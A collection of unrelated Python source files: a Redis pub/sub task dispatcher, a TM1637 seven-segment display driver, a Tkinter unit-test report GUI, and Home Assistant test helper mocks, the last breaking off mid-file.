# -*- encoding: utf-8 -*- import json import importlib import os import builtins from multiprocessing import Process from importlib.util import find_spec __all__=['run'] def run(): from utils.RedisHelper import RedisHelper _redis=RedisHelper() _redis.pubsub=_redis.conn.pubsub() _redis.pubsub.subscribe(_redis.sub_name) sub_message=next(_redis.pubsub.listen()) print(sub_message) #订阅消息 # on manage.py -e local # {'type': 'subscribe', 'pattern': None, 'channel': b'nlp_test_pub', 'data': 1} # if "subscribe"!=sub_message['type'] or _redis.sub_name!=sub_message["channel"].decode('utf-8','ignore'): # raise "sub error" for message in _redis.pubsub.listen(): if "message"!=message['type'] or _redis.sub_name!=sub_message["channel"].decode('utf-8','ignore'): print('type erro') continue # 默认不会有错误 message['data']=message['data'].decode('utf-8','ignore') try: data=json.loads(message['data']) except: # 打印日志 # print('json parse error',message) continue # 控制必要的字段 if "type" not in data: continue ### 暂时只进行单项任务 if "initialize" !=data["type"]: continue # 获取该任务唯一id if "uid_list" not in data["data"]: continue id_list = data["data"]["uid_list"] try: uid=_redis.conn.rpop(id_list).decode('utf-8','ignore') except: print("uid error",uid) continue if int(uid)>=data["data"]["sub_count"]: raise "uid Index exceeded" ## 优化报错 # os.environ['uid']=uid # print("initialize uid is ",uid) if find_spec('handlers.'+data.get("type",""),package='..'): handlers=importlib.import_module('handlers.'+data.get("type",""),package='..') else: continue raise "import error" # 优化容错 # # 优化 # if hasattr(handlers,message.get("type","")): # handlers=getattr(handlers,message.get("type","")) p=Process(target=handlers.run,args=[data,int(uid)]) p.start() p.join()
tm1637.py
"""Manipulate a TM1637 7-segment display.""" import math import threading from time import localtime, sleep from . import config as cg from .context import IO IO.setwarnings(False) IO.setmode(IO.BCM) HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d, 0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71] ADDR_AUTO = 0x40 ADDR_FIXED = 0x44 STARTADDR = 0xC0 class TM1637(object): """TM1637 7-Segment Display.""" def __init__(self, clk, dio, brightness=1.0): """Initializer.""" self.CLK = clk self.DIO = dio self.brightness = brightness self.double_point = False self.current_values = [0, 0, 0, 0] IO.setup(self.CLK, IO.OUT) IO.setup(self.DIO, IO.OUT) def cleanup(self): """Stop updating clock, turn off display, and cleanup GPIO.""" self.stop_clock() self.clear() IO.cleanup() def clear(self): """Clear display.""" b = self.brightness point = self.double_point self.brightness = 0 self.double_point = False data = [0x7F, 0x7F, 0x7F, 0x7F] self.show(data) # Restore previous settings: self.brightness = b self.double_point = point def show(self, data): """Show data on display.""" for i in range(0, 4): self.current_values[i] = data[i] self.start() self.write_byte(ADDR_AUTO) self.br() self.write_byte(STARTADDR) for i in range(0, 4): self.write_byte(self.coding(data[i])) self.br() self.write_byte(0x88 + int(self.brightness)) self.stop() def set_digit(self, idx, data): """Set 7-segment digit by index [0, 3].""" assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data) self.current_values[idx] = data self.start() self.write_byte(ADDR_FIXED) self.br() self.write_byte(STARTADDR | idx) self.write_byte(self.coding(data)) self.br() self.write_byte(0x88 + int(self.brightness)) self.stop() def set_brightness(self, percent): """Set brightness in range 0-1.""" max_brightness = 7.0 brightness = math.ceil(max_brightness * percent) if (brightness < 0): brightness = 0 if (self.brightness != brightness): self.brightness = brightness self.show(self.current_values) def show_colon(self, on): """Show or hide double point divider.""" if (self.double_point != on): self.double_point = on self.show(self.current_values) def write_byte(self, data): """Write byte to display.""" for i in range(0, 8): IO.output(self.CLK, IO.LOW) if (data & 0x01): IO.output(self.DIO, IO.HIGH) else: IO.output(self.DIO, IO.LOW) data = data >> 1 IO.output(self.CLK, IO.HIGH) # Wait for ACK IO.output(self.CLK, IO.LOW) IO.output(self.DIO, IO.HIGH) IO.output(self.CLK, IO.HIGH) IO.setup(self.DIO, IO.IN) while IO.input(self.DIO): sleep(0.001) if (IO.input(self.DIO)): IO.setup(self.DIO, IO.OUT) IO.output(self.DIO, IO.LOW) IO.setup(self.DIO, IO.IN) IO.setup(self.DIO, IO.OUT) def start(self): """Send start signal to TM1637.""" IO.output(self.CLK, IO.HIGH) IO.output(self.DIO, IO.HIGH) IO.output(self.DIO, IO.LOW) IO.output(self.CLK, IO.LOW) def stop(self): """Stop clock.""" IO.output(self.CLK, IO.LOW) IO.output(self.DIO, IO.LOW) IO.output(self.CLK, IO.HIGH) IO.output(self.DIO, IO.HIGH) def br(self): """Terse break.""" self.stop() self.start() def coding(self, data): """Set coding of display.""" point_data = 0x80 if self.double_point else 0 return 0 if data == 0x7F else HexDigits[data] + point_data def clock(self, military_time): """Clock thread script.""" # Based on: https://github.com/johnlr/raspberrypi-tm1637 self.show_colon(True) while (not self.__stop_event.is_set()): t = localtime() hour = t.tm_hour if not military_time: hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12 d0 = hour // 10 if hour // 10 else 0 d1 = hour % 10 d2 = t.tm_min // 10 d3 = t.tm_min % 10 digits = [d0, d1, d2, d3] self.show(digits) # # Optional visual feedback of running alarm: # print digits # for i in tqdm(range(60 - t.tm_sec)): for i in range(60 - t.tm_sec): if (not self.__stop_event.is_set()): sleep(1) def start_clock(self, military_time=True): """Start clock thread.""" # Stop event based on: http://stackoverflow.com/a/6524542/3219667 self.__stop_event = threading.Event() self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,)) self.__clock_thread.daemon = True # stops w/ main thread self.__clock_thread.start() def stop_clock(self): """Stop clock thread.""" try: print('Attempting to stop live clock') self.__stop_event.set() self.clear() except AttributeError: print('No clock to close') if __name__ == '__main__': """Confirm the display operation""" # Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21) clock = cg.get_pin('7Segment', 'clk') digital = cg.get_pin('7Segment', 'dio') display = TM1637(CLK=clock, DIO=digital, brightness=1.0) print('clock', clock) print('digital', digital) display.clear() digits = [1, 2, 3, 4] display.show(digits) input('1234 - Working? (Press Key)') print('Updating one digit at a time:') display.clear() display.set_digit(1, 3) sleep(0.5) display.set_digit(2, 2) sleep(0.5) display.set_digit(3, 1) sleep(0.5) display.set_digit(0, 4) input('4321 - (Press Key)') print('Add double point\n') display.show_colon(True) sleep(0.2) print('Brightness Off') display.set_brightness(0) sleep(0.5) print('Full Brightness') display.set_brightness(1) sleep(0.5) print('30% Brightness') display.set_brightness(0.3) sleep(0.3) input('Start the clock?') display.start_clock(military_time=True) input('Stop the clock?') display.stop_clock()
UT_HTMLReportAnalysisAndReportPreparation_GUI.py
from tkinter import Label, Button, Entry import tkinter as tk from tkinter import messagebox, filedialog, StringVar, SUNKEN, W, X, BOTTOM from os import path import threading, sys import os import UT_HTMLReportAnalysisAndReportPreparation class GUI_COntroller: ''' This class initialize the required controls for TkInter GUI ''' def __init__(self,TkObject): #Load company image Imageloc=tk.PhotoImage(file='../Images/alstom_logo.gif') label3=Label(image=Imageloc,) label3.image = Imageloc label3.place(x=200,y=100) global TkObject_ref, entryText_UTResPath, AnalyseDirRunBatchButton #1. select LDRA Tool suite directory TkObject_ref = TkObject LDRAToolsuitePath=Button(TkObject_ref,activebackground='green',borderwidth=3, anchor="w", text='Select UT test results path:',width=30, command=lambda:GUI_COntroller.selectResDirectory("SourceFilePath"), cursor="hand2") LDRAToolsuitePath.place(x=30,y=200) LDRAToolsuitePath.config(font=('helvetica',10,'bold')) #1. This is text box where LDRA tool suite directory will be shown to user entryText_UTResPath = tk.StringVar() Entry_LDRAToolSuitePath= Entry(TkObject_ref, width=78, textvariable=entryText_UTResPath, bd=1) Entry_LDRAToolSuitePath.place(x=290,y=205) Entry_LDRAToolSuitePath.config(font=('helvetica',10), state="readonly") #Exit Window closeButton=Button(TkObject_ref,activebackground='green',borderwidth=4, text='Close Window', command=GUI_COntroller.exitWindow) closeButton.place(x=570,y=300) closeButton.config(font=('helvetica',11,'bold')) #select sequence files directory AnalyseDirRunBatchButton=Button(TkObject_ref,activebackground='green',borderwidth=4, text='Generate UT Report',width=25, command=GUI_COntroller.RunTest) AnalyseDirRunBatchButton.place(x=200,y=300) AnalyseDirRunBatchButton.config(font=('helvetica',11,'bold')) def selectResDirectory(dirSelectionType): global entryText_UTResPath currdir = os.getcwd() if dirSelectionType == "SourceFilePath": selectedDir_res = filedialog.askdirectory(initialdir=currdir, title='Please select UT Results directory') if len(selectedDir_res)> 0: if not path.isdir(selectedDir_res): entryText_UTResPath.set("") messagebox.showerror('Error','Please select a valid directory!') else: entryText_UTResPath.set(str(selectedDir_res)) def exitWindow(): TkObject_ref.destroy() def RunTest(): if len(entryText_UTResPath.get()) > 0: ProjectDirAnalysis.RunAnalysis() else: messagebox.showerror('Error','Please select LDRA tool path!') class ProjectDirAnalysis: def RunAnalysis(): global statusBarText AnalyseDirRunBatchButton.config(state="disabled") statusBarText = StringVar() StatusLabel = Label(TkObject_ref, textvariable=statusBarText, fg="green", bd=1,relief=SUNKEN,anchor=W) StatusLabel.config(font=('helvetica',11,'bold')) StatusLabel.pack(side=BOTTOM, fill=X) thread = threading.Thread(target=UT_HTMLReportAnalysisAndReportPreparation.script_exe, args = (entryText_UTResPath.get(), TkObject_ref, statusBarText)) thread.start() if __name__ == '__main__': root = tk.Tk() #Change the background window color root.configure(background='#b7bbc7') #Set window parameters root.geometry('850x680') root.title('UT Results analysis') #Removes the maximizing option root.resizable(0,0) ObjController = GUI_COntroller(root) #keep the main window is running root.mainloop() sys.exit()
common.py
"""Test the helper method for writing tests.""" from __future__ import annotations import asyncio from collections import OrderedDict from collections.abc import Awaitable, Callable, Collection from contextlib import contextmanager from datetime import datetime, timedelta import functools as ft from io import StringIO import json import logging import os import pathlib import threading import time from time import monotonic import types from typing import Any from unittest.mock import AsyncMock, Mock, patch from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401 from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import device_automation, recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, ) from homeassistant.components.mqtt.models import ReceiveMessage from homeassistant.config import async_process_component_config from homeassistant.const import ( DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_STATE_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.dispatcher import async_dispatcher_connect from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.uuid as uuid_util import homeassistant.util.yaml.loader as yaml_loader _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" async def async_get_device_automations( hass: HomeAssistant, automation_type: device_automation.DeviceAutomationType, device_id: str, ) -> Any: """Get a device automation for a single device id.""" automations = await device_automation.async_get_device_automations( hass, automation_type, [device_id] ) return automations.get(device_id) def threadsafe_callback_factory(func): """Create threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) loop_stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() loop_stop_event.set() orig_stop = hass.stop hass._stopped = Mock(set=loop.stop) def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() loop_stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop, load_registries=True): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return orig_async_create_task(coroutine) async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None: """Block until at most max_remaining_tasks remain. Based on HomeAssistant.async_block_till_done """ # To flush out any call_soon_threadsafe await asyncio.sleep(0) start_time: float | None = None while len(self._pending_tasks) > max_remaining_tasks: pending: Collection[Awaitable[Any]] = [ task for task in self._pending_tasks if not task.done() ] self._pending_tasks.clear() if len(pending) > max_remaining_tasks: remaining_pending = await self._await_count_and_log_pending( pending, max_remaining_tasks=max_remaining_tasks ) self._pending_tasks.extend(remaining_pending) if start_time is None: # Avoid calling monotonic() until we know # we may need to start logging blocked tasks. start_time = 0 elif start_time == 0: # If we have waited twice then we set the start # time start_time = monotonic() elif monotonic() - start_time > BLOCK_LOG_TIMEOUT: # We have waited at least three loops and new tasks # continue to block. At this point we start # logging all waiting tasks. for task in pending: _LOGGER.debug("Waiting for task: %s", task) else: self._pending_tasks.extend(pending) await asyncio.sleep(0) async def _await_count_and_log_pending( self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0 ) -> Collection[Awaitable[Any]]: """Block at most max_remaining_tasks remain and log tasks that take a long time. Based on HomeAssistant._await_and_log_pending """ wait_time = 0 return_when = asyncio.ALL_COMPLETED if max_remaining_tasks: return_when = asyncio.FIRST_COMPLETED while len(pending) > max_remaining_tasks: _, pending = await asyncio.wait( pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when ) if not pending or max_remaining_tasks: return pending wait_time += BLOCK_LOG_TIMEOUT for task in pending: _LOGGER.debug("Waited %s seconds for task: %s", wait_time, task) return [] hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass) hass._await_count_and_log_pending = types.MethodType( _await_count_and_log_pending, hass ) hass.data[loader.DATA_CUSTOM_COMPONENTS] = {} hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.set_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.media_dirs = {"local": get_test_config_dir("media")} hass.config.skip_pip = True hass.config_entries = config_entries.ConfigEntries( hass, { "_": "Not empty or else some bad checks for hass config in discovery.py breaks" }, ) # Load the registries if load_registries: await asyncio.gather( device_registry.async_load(hass), entity_registry.async_load(hass), area_registry.async_load(hass), ) await hass.async_block_till_done() hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch.object(hass, "async_stop_track_tasks"): await orig_start() hass.async_start = mock_async_start @ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance) return hass def async_mock_service(hass, domain, service, schema=None): """Set up a fake service & return a calls log list to this service.""" calls = [] @ha.callback def mock_service_log(call): # pylint: disable=unnecessary-lambda """Mock service call.""" calls.append(call) hass.services.async_register(domain, service, mock_service_log, schema=schema) return calls mock_service = threadsafe_callback_factory(async_mock_service) @ha.callback def async_mock_intent(hass, intent_typ): """Set up a fake intent handler.""" intents = [] class MockIntentHandler(intent.IntentHandler): intent_type = intent_typ async def async_handle(self, intent): """Handle the intent.""" intents.append(intent) return intent.create_response() intent.async_register(hass, MockIntentHandler()) return intents @ha.callback def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False): """Fire the MQTT message.""" if isinstance(payload, str): payload = payload.encode("utf-8") msg = ReceiveMessage(topic, payload, qos, retain) hass.data["mqtt"]._mqtt_handle_message(msg) fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message) @ha.callback def async_fire_time_changed( hass: HomeAssistant, datetime_: datetime = None, fire_all: bool = False ) -> None: """Fire a time changed event.""" if datetime_ is None: utc_datetime = date_util.utcnow() else: utc_datetime = date_util.as_utc(datetime_) timestamp = date_util.utc_to_timestamp(utc_datetime) for task in list(hass.loop._scheduled): if not isinstance(task, asyncio.TimerHandle): continue if task.cancelled(): continue mock_seconds_into_future = timestamp - time.time() future_seconds = task.when() - hass.loop.time() if fire_all or mock_seconds_into_future >= future_seconds: with patch( "homeassistant.helpers.event.time_tracker_utcnow", return_value=utc_datetime, ), patch( "homeassistant.helpers.event.time_tracker_timestamp", return_value=timestamp, ): task._run() task.cancel() fire_time_changed = threadsafe_callback_factory(async_fire_time_changed) def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path: """Get path of fixture.""" if integration is None and "/" in filename and not filename.startswith("helpers/"): integration, filename = filename.split("/", 1) if integration is None: return pathlib.Path(__file__).parent.joinpath("fixtures", filename) else: return pathlib.Path(__file__).parent.joinpath( "components", integration, "fixtures", filename ) def load_fixture(filename, integration=None): """Load a fixture.""" return get_fixture_path(filename, integration).read_text() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = {"entity_id": new_state.entity_id, "new_state": new_state} if old_state: event_data["old_state"] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context) @ha.callback def mock_component(hass, component): """Mock a component is setup.""" if component in hass.config.components: AssertionError(f"Integration {component} is already setup") hass.config.components.add(component) def mock_registry(hass, mock_entries=None): """Mock the Entity Registry.""" registry = entity_registry.EntityRegistry(hass) if mock_entries is None: mock_entries = {} registry.entities = entity_registry.EntityRegistryItems() for key, entry in mock_entries.items(): registry.entities[key] = entry hass.data[entity_registry.DATA_REGISTRY] = registry return registry def mock_area_registry(hass, mock_entries=None): """Mock the Area Registry.""" registry = area_registry.AreaRegistry(hass) registry.areas = mock_entries or OrderedDict() hass.data[area_registry.DATA_REGISTRY] = registry return registry def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None): """Mock the Device Registry.""" registry = device_registry.DeviceRegistry(hass) registry.devices = mock_entries or OrderedDict() registry.deleted_devices = mock_deleted_entries or OrderedDict() registry._rebuild_index() hass.data[device_registry.DATA_REGISTRY] = registry return registry class MockGroup(auth_models.Group): """Mock a group in Home Assistant.""" def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY): """Mock a group.""" kwargs = {"name": name, "policy": policy} if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._groups[self.id] = self return self class MockUser(auth_models.User): """Mock a user in Home Assistant.""" def __init__( self, id=None, is_owner=False, is_active=True, name="Mock User", system_generated=False, groups=None, ): """Initialize mock user.""" kwargs = { "is_owner": is_owner, "is_active": is_active, "name": name, "system_generated": system_generated, "groups": groups or [], "perm_lookup": None, } if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._users[self.id] = self return self def mock_policy(self, policy): """Mock a policy for a user.""" self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup) async def register_auth_provider(hass, config): """Register an auth provider.""" provider = await auth_providers.auth_provider_from_config( hass, hass.auth._store, config ) assert provider is not None, "Invalid config specified" key = (provider.type, provider.id) providers = hass.auth._providers if key in providers: raise ValueError("Provider already registered") providers[key] = provider return provider @ha.callback def ensure_auth_manager_loaded(auth_mgr): """Ensure an auth manager is considered loaded.""" store = auth_mgr._store if store._users is None: store._set_defaults() class MockModule: """Representation of a fake module.""" # pylint: disable=invalid-name def __init__( self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, platform_schema_base=None, async_setup=None, async_setup_entry=None, async_unload_entry=None, async_migrate_entry=None, async_remove_entry=None, partial_manifest=None, async_remove_config_entry_device=None, ): """Initialize the mock module.""" self.__name__ = f"homeassistant.components.{domain}" self.__file__ = f"homeassistant/components/{domain}" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] # Overlay to be used when generating manifest from this module self._partial_manifest = partial_manifest if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if platform_schema_base is not None: self.PLATFORM_SCHEMA_BASE = platform_schema_base if setup: # We run this in executor, wrap it in function self.setup = lambda *args: setup(*args) if async_setup is not None: self.async_setup = async_setup if setup is None and async_setup is None: self.async_setup = AsyncMock(return_value=True) if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry if async_remove_config_entry_device is not None: self.async_remove_config_entry_device = async_remove_config_entry_device def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, scan_interval=None, ): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, pref_disable_new_entities=None, pref_disable_polling=None, unique_id=None, disabled_by=None, reason=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid_util.random_uuid_hex(), "domain": domain, "data": data or {}, "pref_disable_new_entities": pref_disable_new_entities, "pref_disable_polling": pref_disable_polling, "options": options, "version": version, "title": title, "unique_id": unique_id, "disabled_by": disabled_by, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) if reason is not None: self.reason = reason def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries[self.entry_id] = self hass.config_entries._domain_index.setdefault(self.domain, []).append( self.entry_id ) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries[self.entry_id] = self manager._domain_index.setdefault(self.domain, []).append(self.entry_id) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(files_dict.keys(), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if isinstance(fname, pathlib.Path): fname = str(fname) if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" SetupRecorderInstanceT = Callable[..., Awaitable[recorder.Recorder]] def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} if recorder.CONF_DB_URL not in config: config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB if recorder.CONF_COMMIT_INTERVAL not in config: config[recorder.CONF_COMMIT_INTERVAL] = 0 with patch("homeassistant.components.recorder.ALLOW_IN_MEMORY_DB", True), patch( "homeassistant.components.recorder.migration.migrate_schema" ): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info( "Test recorder successfully started, database location: %s", config[recorder.CONF_DB_URL], ) def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state = { **restored_state, "attributes": json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ), } last_states[state.entity_id] = restore_state.StoredState.from_dict( {"state": restored_state, "last_seen": now} ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data def mock_restore_cache_with_extra_data(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state, extra_data in states: restored_state = state.as_dict() restored_state = { **restored_state, "attributes": json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ), } last_states[state.entity_id] = restore_state.StoredState.from_dict( {"state": restored_state, "extra_data": extra_data, "last_seen": now} ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def 